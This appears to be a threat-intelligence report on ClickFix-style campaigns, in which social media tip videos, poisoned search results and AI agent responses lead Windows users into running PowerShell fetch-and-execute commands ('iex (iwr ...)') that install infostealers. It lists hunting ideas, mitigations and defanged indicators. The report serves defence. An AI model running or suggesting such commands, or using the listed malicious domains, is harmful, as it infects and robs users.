The "vice" in tech advice: ClickFix-style commands disguised as tech tips across social media platforms and beyond

Key Takeaways

• ClickFix-style attacks are heavily promoted via social media videos (TikTok, YouTube, Facebook, Instagram) disguised as tech tips.
• The campaign uses SEO poisoning and AI agent responses to broaden its reach beyond direct social media users.
• Victims are socially engineered into executing malicious PowerShell commands (e.g., iex and iwr/irm) that initiate a fileless infection chain.
• The attack chain utilizes Cloudflare Pages for staging and ultimately deploys infostealers like Vidar, StealC, and AuraStealer.
• Personal browsing and software modification attempts on corporate devices can lead to enterprise compromise.

Affected Systems

• Windows

Attack Chain

The victim is lured via social media videos, SEO poisoned search results, or AI agent responses to execute a PowerShell command. This command fetches a fileless staging script from a first-stage domain, which verifies the User-Agent. The script then redirects to a second-stage Cloudflare Pages domain to download a payload that disables AMSI, performs anti-sandbox checks, and establishes persistence via registry Run keys or scheduled tasks. Finally, a third-stage payload, typically the Vidar infostealer, is downloaded and executed.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No

No specific detection rules or queries were provided in the article.

Detection Engineering Assessment

EDR Visibility: High — EDR solutions have strong visibility into PowerShell execution, AMSI bypass attempts, and registry modifications for persistence. Network Visibility: Medium — Initial staging scripts are fetched over HTTP/HTTPS, but the use of legitimate services like Cloudflare Pages (*.pages.dev) may blend in with normal traffic. Detection Difficulty: Moderate — While the initial execution relies on user interaction and LOLBins (PowerShell), the subsequent behaviors (AMSI tampering, Defender exclusions, Run key persistence) are highly anomalous and detectable.

Required Log Sources

• Windows Event Log (Security)
• PowerShell Script Block Logging (EID 4104)
• Sysmon (EID 1, 3, 11, 12, 13)

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for PowerShell processes executing with iex and iwr or irm commands fetching payloads from external domains, especially .dev or .run TLDs.	Process Creation (EID 4688) / PowerShell Script Block Logging (EID 4104)	Execution	Medium
Monitor for PowerShell processes attempting to modify Windows Defender exclusion paths or disable AMSI.	Registry Modifications (Sysmon EID 12/13) / PowerShell Script Block Logging	Defense Evasion	Low
Hunt for unexpected scheduled tasks or registry Run keys created by PowerShell processes.	Process Creation / Registry Modifications	Persistence	Low

Control Gaps

• Web filtering (Cloudflare Pages often allowed)
• Endpoint AV (fileless execution evades traditional disk-based signatures)

Key Behavioral Indicators

• PowerShell User-Agent strings in web proxy logs
• PowerShell executing iex with web requests
• Modifications to Defender exclusion registry keys

False Positive Assessment

• Low

Recommendations

Immediate Mitigation

• Block known malicious domains and Cloudflare Pages URLs associated with this campaign.
• Hunt for execution of the identified PowerShell commands (iex/iwr/irm) in endpoint telemetry.

Infrastructure Hardening

• Enable and monitor PowerShell Script Block Logging.
• Restrict PowerShell execution policies for standard users.
• Implement strict web filtering for newly registered or uncategorized domains.

User Protection

• Deploy EDR solutions configured to block AMSI tampering and unauthorized Defender exclusions.
• Restrict user permissions to prevent unauthorized registry modifications and scheduled task creation.

Security Awareness

• Educate employees on the risks of executing commands found in social media videos, AI responses, or unofficial forums.
• Enforce policies against using corporate devices for personal social media browsing or unauthorized software activation.

MITRE ATT&CK Mapping

• T1059.001 - Command and Scripting Interpreter: PowerShell
• T1204.002 - User Execution: Malicious File
• T1562.001 - Impair Defenses: Disable or Modify Tools
• T1497.001 - Virtualization/Sandbox Evasion: System Checks
• T1053.005 - Scheduled Task/Job: Scheduled Task
• T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Additional IOCs

• Domains:
  • msact[[.]]run - First-stage domain used in lure videos
  • wslm[[.]]net - First-stage domain used in lure videos
  • slmgr[[.]]win - First-stage domain used in lure videos
  • slmgr[[.]]ws - First-stage domain used in lure videos
  • slmgr[[.]]sh - First-stage domain used in lure videos
  • msauth[[.]]cc - First-stage domain used in lure videos
  • msauth[[.]]in - First-stage domain used in lure videos
  • activepro[[.]]cc - First-stage domain used in lure
  • keytool[[.]]cc - First-stage domain used in lure
  • activated[[.]]sh - First-stage domain used in lure
  • activator[[.]]tools - First-stage domain used in lure
  • debloat[.]io - Domain used in Google Sponsored ads for fake debloat tool
  • lib-9ab[.]pages[[.]]dev - Second-stage domain used to fetch payload script
  • lib-2j8[.]pages[[.]]dev - Second-stage domain used to fetch payload script
  • settingss[.]pages[.]dev - Second-stage domain used to fetch payload script
  • settings-4av[.]pages[[.]]dev - Second-stage domain used to fetch payload script
  • installsh[.]pages[[.]]dev - Second-stage domain used to fetch payload script
  • cdn-4gp[.]pages[[.]]dev - Second-stage domain used to fetch payload script
  • settings-320[.]pages[.]dev - Second-stage domain used to fetch payload script
  • file-epq[.]pages[[.]]dev - Third-stage domain hosting final payload
  • install-5yq[.]pages[[.]]dev - Third-stage domain hosting final payload
  • crypted[.]pages[.]dev - Third-stage domain hosting final payload
  • cdn-27z[.]pages[[.]]dev - Third-stage domain hosting final payload
  • process-e7b[.]pages[[.]]dev - Third-stage domain hosting final payload
  • backup-5de[.]pages[[.]]dev - Third-stage domain hosting final payload
  • jacrcell[[.]]com - Third-stage domain hosting final payload
  • tranquilityparadise[.]com[[.]]np - Third-stage domain hosting final payload
  • tmopgm[.]org[[.]]ng - Third-stage domain hosting final payload
  • ravenfootballclub[[.]]com - Third-stage domain hosting final payload
  • py-3ow[.]pages[[.]]dev - Third-stage domain hosting final payload
• File Hashes:
  • 792bf3c09a9c5b356b1d80e2ae4e4aff2ac928cb559221f3411f25bfdeca275a (SHA256) - Second-stage script
  • f2bddc0a8ddc8ad2bfe602d52b3e80c644eb74feae7c34d7b02e0f771f2ae0a4 (SHA256) - Second-stage script
  • 81cadd9f24233803a201e3dacbe247db80aae5e038e2002118102a0f6c8b8243 (SHA256) - Second-stage script
  • 6d897b5661aa438a96ac8695c54b7c4f3a1fbf1b628c8d2011e50864860c6b23 (SHA256) - Second-stage script
  • 4ab7f5af2f965d71bf4804e9c2fd8907fbfa61477c8b796fb52ad9780c490df7 (SHA256) - Second-stage script
  • c9d98eaf38adb0bc078d8c197aebd4ddb9221a4d4833578ef6170252a2cf4398 (SHA256) - Second-stage script
  • 789284801ce260e1b5d0b1f1eca2aedcab472f5ccb8b8cfc89a1f8134bdc416c (SHA256) - Second-stage script
• Command Lines:
  • Purpose: Initial execution of fileless staging script via web request | Tools: PowerShell | Stage: Initial Access / Execution | iex (iwr ...)
  • Purpose: Initial execution of fileless staging script via web request (alias variation) | Tools: PowerShell | Stage: Initial Access / Execution | iex (irm ...)
• Other:
  • @windows.tips1 - TikTok user posting lure videos
  • @msauth49 - TikTok user posting lure videos
  • @slmgr-sh - YouTube user posting lure videos
  • @multicorecc - YouTube user posting lure videos
  • wtips404 - Instagram user posting lure videos
  • wndwstips - Instagram user posting lure videos
  • tipstalkai - Instagram user posting lure videos
  • msauthcc - Instagram user posting lure videos